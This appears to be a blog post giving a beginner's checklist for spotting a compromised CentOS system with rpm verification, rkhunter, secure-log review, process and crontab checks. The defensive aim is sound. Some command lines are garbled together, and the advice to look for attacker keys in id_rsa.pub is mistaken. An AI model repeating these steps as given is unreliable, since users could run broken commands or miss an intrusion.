In today’s digital world, keeping our systems secure is something we all care deeply about. Whether you’re a tech pro or just someone who values online safety, the thought of a compromised system can be unsettling.
Part 1: The Basics – Identifying Signs
This blog has 3 parts. Starting with the essentials, we’ll guide you through a basic checklist designed to help you recognize if your system has been compromised or hacked. We’ll focus on CentOS, a widely used Linux distribution.
List of Checks Which Can Determine if A System Is Compromised or Hacked
Check Your Main Packages for Changes
Generally, when a hacker breaks into a Linux system, there is a high chance that they will alter your main packages like OpenSSH, kernel, etc., So first of all please check if these packages are altered or there are some changes in the files or binaries provided by these packages.
Following are commands to check on Centos
sudo rpm -qa | grep openssh | xargs -I '{}' sudo rpm -V '{}'
If there are files shown by the above command in which you did not change anything then it means there is a high chance your system is compromised.
Run rootkit Hunter to check if you system is compromised:
Download rkhunter.tar.gz
Copy it in /root and goto /root
Run the following commands
tar zxvf rkhunter-1.4.2.tar.gz
cd rkhunter-1.4.2/
sh installer.sh --layout default --install
Edit rkhunter.conf
ENABLE_TESTS="all" DISABLE_TESTS="none" HASH_CMD=SHA1 HASH_FLD_IDX=4 PKGMGR=RPM 7
Run the following commands
/usr/local/bin/rkhunter --propupd/usr/local/bin/rkhunter --update/usr/local/bin/rkhunter -c -sk 10.
Note output or check and copy /var/log/rkhunter.log
Following things we can check in the log file
- Timestamps: The log file will contain timestamps for each scan. These timestamps can help you track when the scans were performed.
- Scan Summary: Look for a summary section at the beginning or end of the log. It will provide an overview of the scan results, including the number of checks performed, warnings, and any potential issues.
- Warnings and Suspicious Findings: Rkhunter will report any warnings or suspicious findings it encounters during the scan. These findings could include files or processes that match known rootkit signatures, suspicious configuration changes, or other anomalies. Pay close attention to these warnings as they indicate potential security threats.
- File and Directory Checks: Rkhunter checks various files and directories for changes or anomalies. It reports any discrepancies it finds. For example, if a system file has been modified or replaced, rkhunter may flag it as a potential issue.
- Known Rootkit Signatures: Rkhunter uses a database of known rootkit signatures to compare against files and processes on your system. If it finds a match, it will report it in the log.
You can also check the link for using rkhunter
Analyzing Secure Logs
Check /var/log/secure to check if there are many authentication failure requests and someone trying brute force to enter into the system:
the following will be the command:
[root@localhost ~]# less /var/log/secure | grep 'authentication failures'
and output will be something like:
Apr 25 12:48:46 localhost sshd[2391]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root
Apr 25 12:49:33 localhost sshd[2575]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.29.14 user=root
In the above output, you can see the rhost from where login attempts are made.
If you see lots of entries like this then also check if at some point of time some login attempt will be successful from any of attempting rhosts .
In secure logs accepted logs will looks something like as follows :
Apr 25 12:53:10 localhost sshd[3551]: Accepted password for root from 192.168.29.14 port 36362 ssh2
Check for Unusual or High CPU Consuming Processes
Check in processes if some unusual process is running and consuming high CPU using top and ps commands.
Command to list all process running in the system : ps aux | less
Also, check using the top command if some unusual process trying to utilize a high CPU.
Check if there is some unusual entry in the crontab
Check if there is some unusual entry in the crontab of all users made on the system:
crontab -u <user> -l . by default user is root
Check if hacker has entered private key in id_rsa.pub
Check if in id_rsa.pub, if some attacker has somehow made its entry in the .ssh folder in every users’ home directory.
Conclusion
This was Part 1 of the blog. In later parts, I will explain some further checklists to ensure that your system will remain less hackable.
Thank you.